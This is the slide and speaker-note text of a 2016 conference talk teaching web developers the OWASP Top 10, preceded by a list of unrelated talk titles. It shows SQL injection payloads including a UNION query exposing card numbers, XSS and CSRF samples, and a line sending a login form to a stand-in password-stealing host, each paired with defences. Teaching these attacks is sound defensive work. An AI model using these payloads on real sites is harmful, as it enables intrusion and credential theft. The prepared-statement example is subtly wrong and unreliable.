DSD-INT 2023 HydroMT model building and river-coast coupling in Python - Bove...DSD-INT 2023 HydroMT model building and river-coast coupling in Python - Bove...
DSD-INT 2023 HydroMT model building and river-coast coupling in Python - Bove...
Deltares10 views
DSD-INT 2023 FloodAdapt - A decision-support tool for compound flood risk mit...DSD-INT 2023 FloodAdapt - A decision-support tool for compound flood risk mit...
DSD-INT 2023 FloodAdapt - A decision-support tool for compound flood risk mit...
Deltares5 views
Tridens DevOpsTridens DevOps
Tridens DevOps
Tridens9 views
Unleash The MonkeysUnleash The Monkeys
Unleash The Monkeys
Jacob Duijzer7 views
WebAssemblyWebAssembly
WebAssembly
Jens Siebert30 views
A first look at MariaDB 11.x features and ideas on how to use themA first look at MariaDB 11.x features and ideas on how to use them
A first look at MariaDB 11.x features and ideas on how to use them
Federico Razzoli40 views
SUGCON ANZ Presentation V2.1 Final.pptxSUGCON ANZ Presentation V2.1 Final.pptx
SUGCON ANZ Presentation V2.1 Final.pptx
Jack Spektor19 views
Roadmap y Novedades de productoRoadmap y Novedades de producto
Roadmap y Novedades de producto
Neo4j5 views
Winter '24 Release Chat.pdfWinter '24 Release Chat.pdf
Winter '24 Release Chat.pdf
melbourneauuser8 views
Neo4j y GenAI Neo4j y GenAI
Neo4j y GenAI
Neo4j10 views
Applying Platform Engineering Thining to Observability.pdfApplying Platform Engineering Thining to Observability.pdf
Applying Platform Engineering Thining to Observability.pdf
Natan Yellin10 views
Create Roku ChannelsCreate Roku Channels
Create Roku Channels
Roshan Dwivedi5 views
Consulting for Data Monetization Maximizing the Profit Potential of Your Data...Consulting for Data Monetization Maximizing the Profit Potential of Your Data...
Consulting for Data Monetization Maximizing the Profit Potential of Your Data...
Flexsin 13 views
LAVADORA ROLO.docxLAVADORA ROLO.docx
LAVADORA ROLO.docx
SamuelRamirez835247 views
DevsRankDevsRank
DevsRank
devsrank78610 views

Hacking Your Way to Better Security - ZendCon 2016

  • 1. Hacking Your Way To Better Security
  • 2. Colin O’Dell Lead Web Developer at Unleashed Technologies PHP developer since 2002 league/commonmark maintainer PHP 7 Migration Guide e-book author php[world] 2015 CtF winner @colinodell
  • 3. Goals Explore several top security vulnerabilities from the perspective of an attacker. 1. Understand how to detect and exploit common vulnerabilities 2. Learn how to protect against those vulnerabilities @colinodell
  • 4. Disclaimers 1.NEVER test systems that aren’t yours without explicit permission. 2.Examples in this talk are fictional, but the vulnerability behaviors shown are very real. @colinodell
  • 6. OWASP Top 10 Regular publication by The Open Web Application Security Project Highlights the 10 most-critical web application security risks @colinodell
  • 9. SQL Injection Modifying SQL statements to: Spoof identity Tamper with data Disclose hidden information
  • 10. SQL Injection Basics $value = $_REQUEST['value']; SELECT * FROM x WHERE y = '[MALICIOUS CODE HERE]' "; $sql = "SELECT * FROM x WHERE y = '$value' "; $database->query($sql);
  • 12. Username Password Log In admin password' Invalid username or password. Please double-check and try again.
  • 14. tail –n 1 /var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "password'" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = 'password''; $ $
  • 15. tail –n 1 /var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "password'" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = 'password''; $ $ ~~
  • 18. tail –n 1 /var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "' test" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = '' test'; $ $
  • 19. tail –n 1 /var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "' test" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = '' test'; $ $ ~~~~~~~~
  • 20. ~~~~~~~~ SELECT * FROM users WHERE username = 'admin' AND password = '' test'; SELECT * FROM users WHERE username = 'admin' AND password = ''; SELECT * FROM users WHERE username = 'admin' AND password = '' OR (something that is true); SELECT * FROM users WHERE username = 'admin' AND (true); SELECT * FROM users WHERE username = 'admin';
  • 21. SELECT * FROM users WHERE username = 'admin' AND password = '' test '; ' test
  • 22. SELECT * FROM users WHERE username = 'admin' AND password = '' test '; SELECT * FROM users WHERE username = 'admin' AND password = '' test '; ' test ~~~~~~~~~~~~~~~~~~~~
  • 23. SELECT * FROM users WHERE username = 'admin' AND password = ' '; SELECT * FROM users WHERE username = 'admin' AND password = ' ';
  • 24. SELECT * FROM users WHERE username = 'admin' AND password = '' '; SELECT * FROM users WHERE username = 'admin' AND password = '' '; ' ~~~~
  • 25. SELECT * FROM users WHERE username = 'admin' AND password = '' ' '; SELECT * FROM users WHERE username = 'admin' AND password = '' ' '; ' ' ~~~~~~~~~~~~~~~~
  • 26. SELECT * FROM users WHERE username = 'admin' AND password = '' OR ' '; SELECT * FROM users WHERE username = 'admin' AND password = '' OR ' '; ' OR '
  • 27. SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1 ' '; SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1 ' '; ' OR '1 ' ~~~~
  • 28. SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1' ' '; SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1' ' '; ' OR '1' ' ~~~~~~~~~
  • 29. SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'=' '; SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'=' '; ' OR '1'='
  • 30. SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'='1'; SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'='1'; ' OR '1'='1
  • 31. Username Password Log In admin ' OR '1'='1 Unknown error.
  • 32. Welcome Admin! Admin Menu: Give customer money Take money away Review credit card applications Close accounts
  • 34. Blind SQL Injection Invalid username or password. Please double-check and try again. Unknown error. Valid query (empty result) Invalid query Welcome Admin! Valid query (with result) @colinodell
  • 35. ' AND (SELECT id FROM user LIMIT 1) = ' Username Password admin Log In Real-Time MySQL View
  • 36. ' AND (SELECT id FROM user LIMIT 1) = ' Username Password admin Unknown error. Log In Error LogQuery Log SELECT * FROM users WHERE username = 'admin' AND password = '' AND (SELECT id FROM user LIMIT 1) = '';
  • 37. ' AND (SELECT id FROM user LIMIT 1) = ' Username Password admin Unknown error. Log In Query Log MySQL error: Unknown table 'user'. Error Log
  • 38. ' AND (SELECT id FROM users LIMIT 1) = ' Username Password admin Unknown error. Log In Query Log MySQL error: Unknown table 'user'. Error Log
  • 39. ' AND (SELECT id FROM users LIMIT 1) = ' Username Password admin Invalid username or password. Please double-check and try again. Log In
  • 40. SQL Injection - Data Disclosure
  • 41. SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/123 SELECT * FROM books WHERE id = 123 $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => 'The Great Gatsby', 'author' => 'F. Scott Fitzgerald', 'price' => 9.75 } @colinodell
  • 42. SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 SELECT * FROM books WHERE id = 99999 $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { } @colinodell
  • 43. SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/????? SELECT * FROM books WHERE id = ????? $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0.00 } @colinodell
  • 44. SQL UNION Query Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 Column 1 Column 2 Column 3 Foo Bar 123 Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 Foo Bar 123 UNION @colinodell
  • 45. SQL UNION Query Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 Column 1 Column 2 Column 3 (SELECT) 1 1 Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 (SELECT) 1 1 UNION @colinodell
  • 46. SQL UNION Query Column 1 Column 2 Column 3 (empty) Column 1 Column 2 Column 3 (SELECT) 1 1 Column 1 Column 2 Column 3 (SELECT) 1 1 UNION @colinodell
  • 47. SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number FROM creditcards SELECT * FROM books WHERE id = ????? $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0.00 } @colinodell
  • 48. SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards SELECT * FROM books WHERE id = ????? $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0.00 } @colinodell
  • 49. SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards SELECT * FROM books WHERE id = 99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0 } @colinodell
  • 50. SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards SELECT * FROM books WHERE id = 99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '4012-3456-7890-1234', 'author' => 1, 'price' => 1 } @colinodell
  • 51. Protecting Against SQL Injection $value = $_REQUEST['value']; $sql = "SELECT * FROM x WHERE y = '$value' "; $database->query($sql);
  • 52. Protecting Against SQL Injection Block input with special characters
  • 53. Protecting Against SQL Injection Block input with special characters Escape user input $value = $_REQUEST['value']; $escaped = mysqli_real_escape_string($value); $sql = "SELECT * FROM x WHERE y = '$escaped' "; $database->query($sql); ' OR '1' = '1 ' OR '1' = '1 mysqli_real_escape_string() SELECT * FROM x WHERE y = '' OR '1' = '1'
  • 54. Protecting Against SQL Injection Block input with special characters Escape user input $value = $_REQUEST['value']; $escaped = mysqli_real_escape_string($value); $sql = "SELECT * FROM x WHERE y = '$escaped' "; $database->query($sql); ' OR '1' = '1 ' OR '1' = '1 mysqli_real_escape_string() SELECT * FROM x WHERE y = '' OR '1' = '1'
  • 55. Protecting Against SQL Injection Block input with special characters Escape user input Use prepared statements $mysqli = new mysqli("localhost", "user", "pass", "db"); $q = $mysqli->prepare("SELECT * FROM x WHERE y = '?' "); $q->bind_param(1, $_REQUEST['value']); $q->execute(); Native PHP: ● mysqli ● pdo_mysql Frameworks / Libraries: ● Doctrine ● Eloquent ● Zend_Db
  • 56. Other Types of Injection NoSQL databases OS Commands LDAP Queries SMTP Headers @colinodell
  • 57. XSS Cross-Site Scripting Injecting code into the webpage (for other users) • Execute malicious scripts • Hijack sessions • Install malware • Deface websites
  • 58. XSS Attack Basics $value = $_POST['value']; $value = $rssFeed->first->title; $value = db_fetch('SELECT value FROM table'); <?php echo $value ?> Raw code/script is injected onto a page
  • 59. XSS – Cross-Site Scripting Basics Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners. <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script> @colinodell
  • 60. XSS – Cross-Site Scripting short.ly Paste a URL here Shorten @colinodell
  • 61. XSS – Cross-Site Scripting short.ly http://www.colinodell.com Shorten @colinodell
  • 62. XSS – Cross-Site Scripting short.ly http://www.colinodell.com Shorten Short URL: http://short.ly/b7fe9 Original URL: http://www.colinodell.com @colinodell
  • 63. XSS – Cross-Site Scripting short.ly Please wait while we redirect you to http://www.colinodell.com @colinodell
  • 64. XSS – Cross-Site Scripting short.ly <script>alert('hello world!');</script> Shorten @colinodell
  • 65. XSS – Cross-Site Scripting short.ly <script>alert('hello world!');</script> Shorten Short URL: http://short.ly/3bs8a Original URL: hello world! OK X @colinodell
  • 66. XSS – Cross-Site Scripting short.ly <script>alert('hello world!');</script> Shorten Short URL: http://short.ly/3bs8a Original URL: @colinodell
  • 67. <p> Short URL: <a href="…">http://short.ly/3bs8a</a> </p> <p> Original URL: <a href="…"><script>alert('hello world!');</script></a> </p>
  • 68. XSS – Cross-Site Scripting short.ly <iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ"> Shorten @colinodell
  • 69. XSS – Cross-Site Scripting short.ly <iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ"> Shorten Short URL: http://short.ly/3bs8a Original URL: @colinodell
  • 70. XSS – Cross-Site Scripting short.ly Please wait while we redirect you to @colinodell
  • 71. XSS – Cross-Site Scripting document.getElementById('login-form').action = 'http://malicious-site.com/steal-passwords.php'; @colinodell
  • 72. Protecting Against XSS Attacks $value = $_POST['value']; $value = db_fetch('SELECT value FROM table'); $value = $rssFeed->first->title; <?php echo $value ?>
  • 73. Protecting Against XSS Attacks • Filter user input $value = strip_tags($_POST['value']); $value = strip_tags( db_fetch('SELECT value FROM table') ); $value = strip_tags($rssFeed->first->title); <?php echo $value ?>
  • 74. Protecting Against XSS Attacks • Filter user input • Escape user input $value = htmlspecialchars($_POST['value']); $value = htmlspecialchars( db_fetch('SELECT value FROM table') ); $value = htmlspecialchars($rssFeed->first->title); <?php echo $value ?> <script> &lt;script&gt; htmlspecialchars()
  • 75. Protecting Against XSS Attacks • Filter user input • Escape user input • Escape output $value = $_POST['value']; $value = db_fetch('SELECT value FROM table'); $value = $rssFeed->first->title; <?php echo htmlspecialchars($value) ?>
  • 76. Protecting Against XSS Attacks • Filter user input • Escape user input • Escape output {{ some_variable }} {{ some_variable|raw }}
  • 77. CSRF Cross-Site Request Forgery Execute unwanted actions on another site which user is logged in to. • Change password • Transfer funds • Anything the user can do
  • 78. CSRF – Cross-Site Request Forgery Hi Facebook! I am colinodell and my password is *****. Welcome Colin! Here’s your news feed. Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners. @colinodell
  • 79. CSRF – Cross-Site Request Forgery Hi other website! Show me your homepage. Sure, here you go! Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners. <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script> @colinodell
  • 80. CSRF – Cross-Site Request Forgery <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script> @colinodell
  • 81. CSRF – Cross-Site Request Forgery <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script> Tell Facebook we want to change our password to hacked123 Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners. @colinodell
  • 82. CSRF – Cross-Site Request Forgery <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script> Hi Facebook! Please change my password to hacked123. Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners. Done! @colinodell
  • 83. CSRF – Cross-Site Request Forgery short.ly <img src="https://paypal.com/pay?email=me@evil.com&amt=9999"> Shorten @colinodell
  • 84. CSRF – Cross-Site Request Forgery short.ly Please wait while we redirect you to X @colinodell
  • 86. Protecting Against CSRF Attacks Only use POST requests? NO! POST requests are vulnerable too Common Misconceptions: “<img> tags can only make GET requests” “If a user doesn’t click a form it won’t submit”
  • 87. Protecting Against CSRF Attacks Only use POST requests? Use a secret cookie?
  • 88. Protecting Against CSRF Attacks Only use POST requests? Use a secret cookie? NO! Cookies are sent on every request.
  • 89. Protecting Against CSRF Attacks Only use POST requests? Use a secret cookie? Use random CSRF tokens YES! <input type="hidden" name="token" value="ao3i4yw90sae8rhsdrf"> 1. Generate a random string per user. 2. Store it in their session. 3. Add to form as hidden field. 4. Compare submitted value to session 1. Same token? Proceed. 2. Different/missing? Reject the request.
  • 90. Insecure Direct Object References Access & manipulate objects you shouldn’t have access to
  • 91. Insecure Direct Object References @colinodell
  • 92. Insecure Direct Object References Beverly Cooper @colinodell
  • 93. Insecure Direct Object References @colinodell
  • 94. Insecure Direct Object References @colinodell
  • 95. Insecure Direct Object References @colinodell
  • 96. Insecure Direct Object References @colinodell
  • 97. Protecting Against Insecure Direct Object References Check permission on data input • URL / route parameters • Form field inputs • Basically anything that’s an ID • If they don’t have permission, show a 403 (or 404) page
  • 98. Protecting Against Insecure Direct Object References Check permission on data input Check permission on data output • Do they have permission to access this object? • Do they have permission to even know this exists? • This is not “security through obscurity”
  • 101. Sensitive Data Exposure - CHANGELOG @colinodell
  • 102. Sensitive Data Exposure – composer.lock @colinodell
  • 103. Sensitive Data Exposure – composer.lock @colinodell
  • 104. Sensitive Data Exposure – .git @colinodell
  • 105. Sensitive Data Exposure – robots.txt @colinodell
  • 106. Private information that is stored, transmitted, or backed-up in clear text (or with weak encryption) • Customer information • Credit card numbers • Credentials Sensitive Data Exposure @colinodell
  • 107. Security Misconfiguration & Components with Known Vulnerabilities Default accounts enabled; weak passwords • admin / admin Security configuration • Does SSH grant root access? • Are weak encryption keys used? Out-of-date software • Old versions with known issues • Are the versions exposed? • Unused software running (DROWN attack) @colinodell
  • 108. Components with Known Vulnerabilities @colinodell
  • 109. Components with Known Vulnerabilities @colinodell
  • 110. Components with Known Vulnerabilities @colinodell
  • 111. Protecting Against Sensitive Data Exposure, Security Mismanagement, and Components with Known Vulnerabilities Keep software up-to-date • Install critical updates immediately • Install other updates regularly
  • 112. Protecting Against Sensitive Data Exposure, Security Misconfiguration, and Components with Known Vulnerabilities Keep software up-to-date Keep sensitive data out of web root • Files which provide version numbers • README, CHANGELOG, .git, composer.lock • Database credentials & API keys • Encryption keys
  • 113. Protecting Against Sensitive Data Exposure, Security Misconfiguration, and Components with Known Vulnerabilities Keep software up-to-date Keep sensitive data out of web root Use strong encryption • Encrypt with a strong private key • Encrypt backups and data-in-transit • Use strong hashing techniques for passwords
  • 114. Protecting Against Sensitive Data Exposure, Security Mismanagement, and Components with Known Vulnerabilities Keep software up-to-date Keep sensitive data out of web root Use strong encryption Test your systems • Scan your systems with automated tools • Test critical components yourself • Automated tests • Manual tests
  • 115. Next Steps Test your own applications for vulnerabilities Learn more about security & ethical hacking Enter security competitions (like CtF) Stay informed @colinodell
  • 117. Thanks! Slides & feedback: https://joind.in/talk/11f91 Colin O'Dell @colinodell

Editor's Notes

  1. NO NAME YET
  2. 14 years Capture the Flag is Not a professional security researcher, but I’d like to share some of that knowledge with you today
  3. “Goals of this intermediate-level talk”
  4. “Asking forgiveness is easier than asking for permission” Not if you’re in jail ---- I might mention some real sites, but none are actually vulnerable Just make it easier to explain things since you’re probably familiar with how they’re supposed to function
  5. Non-profit organization Provide free articles, resources, and tools for web security Each risk is documented with a description, detailed examples, mitigation techniques, and references to other helpful resources
  6. [Quickly]
  7. Syntax error Single quote is missing its pair Query is structured differently than expected Table or column doesn’t exist If we know site is vulnerable and see this (#2) SQL injection almost worked Table and column names are valid Assertion failed SQL injection worked (definitely) Database and column names are valid Assertion succeeded or conditional bypassed
  8. Let’s try to figure out table and column names Probably a user table
  9. But previous method is all guesswork What if… just show the data?
  10. OUTRO: So that’s the desired functionality But what if this site was vulnerable? What could we do? Well…
  11. Maybe we could somehow set the id to cause a SQL injection that ouputs other information we want. But how you ask? With the SQL UNION operator…
  12. CLICK TO ANIMATE EXPLANATION OUTRO: Or better yet…
  13. CLICK TO ANIMATE EXPLANATION OUTRO: Or better yet…
  14. So when the server sends the code, The browser runs it as-is Just like all other HTML/JS that intentionally runs
  15. (EXPLAIN CODE) This JS should create an alert popup window (SUBMIT)
  16. AUDIO STARTS NEXT SLIDE
  17. Ex 1: REDDIT Ex 2: phpbb forums
  18. Some data loss Pastebin, Gist, etc
  19. Safer, no data loss
  20. Laravel blade – also automatic, similar syntax
  21. OUTRO: Can also be done by using XSS
  22. [Cross site request forgery] What if we… Would that be safe?
  23. This is one of many common misconceptions some developers have. For example…
  24. Hidden value, only shown on our website, that only us and the current page know OTHER SITES CANT SEE THIS VALUE, ONLY THE USER (due to browser’s same-origin policy) NOT SAVED TO COOKIE OR AVAILABLE OUTSIDE WEBSITE! (AFTER BULLETS) Remember, the attacker doesn’t have access to their session or the HTML you generated dynamically for the particular user.
  25. Let’s imagine Facebook is vulnerable to [READ TITLE] Just change the 9 to an 8…
  26. Even though Facebook never linked us here, we still got here And FB didn’t check again at _this_ point in time OUTRO: Fake example – FB doesn’t do this…
  27. Facebook does check whether you’re authorized to see the image OUTRO: Not just limited to URLs…
  28. If bank is vulnerable, and form is submitted, They won’t check the ID and allow the transfer to go through Bad!
  29. #2 – I like Symfony because it whitelists values in values in dropdowns (…) #3 – Good guideline, but not all-encompassing rule
  30. #3 – That means hiding the objects / IDs as the only measure of security What I mean is not disclosing information users shouldn’t see, or showing actions they can’t take
  31. Actually three different vuln Similar enough
  32. Is private data being exposed to the world?
  33. OUTRO: So that’s sensitive data exposure. In a similar vein we have…
  34. [DROWN: fast description]
  35. You might be thinking OMG they explain the attack? Yes, but it’s a good thing! Problem is: your version is exposed, hackers may know you’re vulnerable
  36. #1 – If there’s a patch available, there’s also a hacker who can understand the original problem and create an exploit #2 – Otherwise software falls into decay and is extremely hard to upgrade when the next critical update rolls out
  37. END: But really, you should hide them
  38. Good advice in general for all security topics we’ve covered And that wraps up the last set of vulenerabilities we’re covering today
  39. Podcasts Slashdot Subreddits